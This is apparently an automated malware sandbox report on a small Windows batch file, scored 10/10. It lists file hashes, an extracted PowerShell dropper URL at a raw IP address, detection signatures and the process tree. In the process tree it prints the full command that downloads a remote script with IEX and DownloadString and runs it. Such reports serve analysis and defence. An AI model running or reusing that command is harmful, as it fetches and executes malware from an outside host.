Analysis
-
max time kernel
75s -
max time network
71s -
platform
windows10_x64 -
resource
win10 -
submitted
20-06-2020 19:10
General
-
Target
35e5f8eb351e284b90bed66d0023236b.bat
-
Size
214B
-
MD5
e2fcc310d8119cd0904e78336960fa89
-
SHA1
de619682273fc1b7211126601c0e1074cc57e246
-
SHA256
1c34218a57d25359c281518cac60c8380aba32fbeea82e9e61585a0c33db7574
-
SHA512
349b96ad50dbb441a256244f07e83cc22f96e212c50cf91ae17d372259c9a37af69e3b548e6a396886b6c50b26da816b897704579916deff8862c4ae77ac0fba
Score
10/10
Malware Config
Extracted
Language
ps1
Source
URLs
ps1.dropper
http://185.103.242.78/pastes/35e5f8eb351e284b90bed66d0023236b
Signatures
-
Suspicious use of WriteProcessMemory 3 IoCs
-
Program crash 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 3 IoCs
-
Suspicious behavior: EnumeratesProcesses 14 IoCs
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\35e5f8eb351e284b90bed66d0023236b.bat"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/35e5f8eb351e284b90bed66d0023236b');Invoke-GKXBUHZ;Start-Sleep -s 10000"2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3796 -s 7043⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
4KB
-
Filesize
4KB
-
-
-
-
-
-
-